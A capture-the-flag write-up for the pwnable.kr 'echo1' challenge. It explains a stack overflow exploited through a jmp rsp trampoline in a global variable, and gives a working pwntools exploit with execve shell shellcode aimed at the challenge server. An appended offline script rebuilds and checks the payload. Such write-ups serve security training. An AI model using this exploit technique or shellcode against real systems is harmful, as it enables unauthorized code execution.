33 - echo1

The Challenge

Pwn this echo service.

download : http://pwnable.kr/bin/echo1

Running at : nc pwnable.kr 9010

The Solution

By running the binary we learned that:

  • We can input a name

  • Three options are given to us:

    • only the first option is implemented, and it is literally named "bof" [lol]

  • Choosing exit asks us to confirm; we can decline. That behavior matters more for echo2, but if we decline and then exit anyway we get a nice print of the process memory map. The stack and library addresses in it change from run to run, which tells us ASLR is turned on.

After further debugging we learned that:

  • No other protection is enabled: no stack canary, NX is off and the binary is not position independent.

  • The name input cannot be overflowed, but its first four bytes are copied into a global variable named "id" in the .bss section. Because the binary is not position independent, the address of "id" is fixed regardless of ASLR, and because NX is off, the section is executable too!

  • Unsurprisingly, the "bof" option reads into a stack buffer that we can overflow; the saved return address sits 40 bytes into the input (32-byte buffer plus the saved rbp).

The attack becomes clear now:

  • The overflow payload is 40 bytes of padding, then the address of "id" (0x6020a0) as the new return address, then the shellcode.

  • "id" holds a jmp rsp (ff e4, supplied as the first two bytes of the name; the binary is x86-64, so this is rsp, not esp). When the function returns into "id", rsp points just past the overwritten return address, i.e. at the shellcode, and the jump lands there.

#!/usr/bin/python3

from pwn import *

# 40 bytes reach the saved return address: 32-byte stack buffer + 8-byte saved rbp
offset = b'AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ'
# return into the global "id" in .bss (no PIE, so the address is fixed; NX off, so it executes)
jmp_address = p64(0x6020a0)
# execve("/bin//sh", NULL, NULL) via syscall 0x3b; contains no newline, so the line read keeps it whole
shellcode = b'\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05'

p = remote('pwnable.kr', 9010)
p.sendline(b'\xFF\xE4') # name: first 4 bytes land in "id" -> jmp rsp (ff e4)
p.sendline(b'1')        # pick the "bof" option
p.sendline(offset + jmp_address + shellcode)  # ret -> id -> jmp rsp -> shellcode
p.recvrepeat(1)
p.interactive()
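The script above fires the payload at the live service without checking it first. The following is an added example, not code from the original write-up: it rebuilds the same payload with only the standard library and models what happens at the vulnerable function's ret (where rip goes, what sits at rsp) together with the input constraints the two reads impose. The 32-byte buffer size, the 128-byte limit on the "bof" read, and the whitespace/newline rules of the name and "bof" reads are assumptions inferred from the 40-byte padding and the sendline-based delivery, not facts the write-up states.

```python
#!/usr/bin/python3
import struct

# Values from the write-up: address of the global "id" in .bss (the binary is
# not PIE, so it is fixed) and the execve("/bin//sh") shellcode.
ID_ADDR = 0x6020a0
JMP_RSP = b"\xff\xe4"          # jmp rsp (2 bytes); lands in the first bytes of "id"
SHELLCODE = (b"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68"
             b"\x53\x54\x5f\xb0\x3b\x0f\x05")

# Assumed frame layout of the "bof" handler: a 32-byte stack buffer, then the
# saved rbp, then the return address (this is what the 40-byte padding implies).
BUF_SIZE = 32
RET_OFFSET = BUF_SIZE + 8      # 40 == len(b"AAAABBBB...JJJJ") in the exploit
MAX_INPUT = 128                # assumed limit of the line-based "bof" read

# Bytes that C's isspace() matches; an assumed scanf("%s")-style name read stops at any of them.
C_WHITESPACE = b" \t\n\v\f\r"


def build_name(trampoline=JMP_RSP):
    """Name input. Only its first 4 bytes are copied into "id", and a %s
    conversion ends at whitespace, so the trampoline must avoid those bytes."""
    if len(trampoline) > 4:
        raise ValueError("only the first 4 bytes of the name reach id")
    if any(b in C_WHITESPACE for b in trampoline):
        raise ValueError("whitespace would terminate the name read early")
    return trampoline


def build_payload(shellcode=SHELLCODE, ret_addr=ID_ADDR):
    """Overflow input: padding up to the return address, the address of "id",
    then the shellcode, which is exactly where rsp points after `ret`."""
    payload = b"A" * RET_OFFSET + struct.pack("<Q", ret_addr) + shellcode
    if b"\n" in payload:
        raise ValueError("a newline would end the line-based read before the shellcode")
    if len(payload) >= MAX_INPUT:
        raise ValueError("payload does not fit in the bof read")
    return payload


def simulate_ret(payload):
    """Model the moment the vulnerable function executes `ret` with the
    overflowed frame: returns (new rip, bytes sitting at rsp)."""
    rip = struct.unpack_from("<Q", payload, RET_OFFSET)[0]
    at_rsp = payload[RET_OFFSET + 8:]
    return rip, at_rsp


def id_is_trampoline(name):
    """What "id" holds after the name prompt, and whether it starts with jmp rsp.
    The remaining bytes of the 4-byte id never execute: the jump is taken first."""
    id_bytes = name[:4].ljust(4, b"\x00")   # the short name is NUL-terminated by the read
    return id_bytes[:2] == JMP_RSP


def shellcode_path(sc):
    """Recover the execve path: the 8 bytes after the movabs rbx, imm64 opcode (48 bb)."""
    i = sc.find(b"\x48\xbb")
    if i < 0:
        raise ValueError("no movabs rbx, imm64 in shellcode")
    return sc[i + 2:i + 10]


if __name__ == "__main__":
    name = build_name()
    payload = build_payload()
    rip, at_rsp = simulate_ret(payload)
    print("id starts with jmp rsp:", id_is_trampoline(name))
    print("rip after ret: %#x (address of id)" % rip)
    print("bytes at rsp == shellcode:", at_rsp == SHELLCODE)
    print("shellcode execs:", shellcode_path(SHELLCODE))
```

These are the checks worth running before touching the service: a stray 0x0a in a freshly assembled shellcode, or a trampoline byte the name read treats as whitespace, is the usual reason this kind of exploit fails silently.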
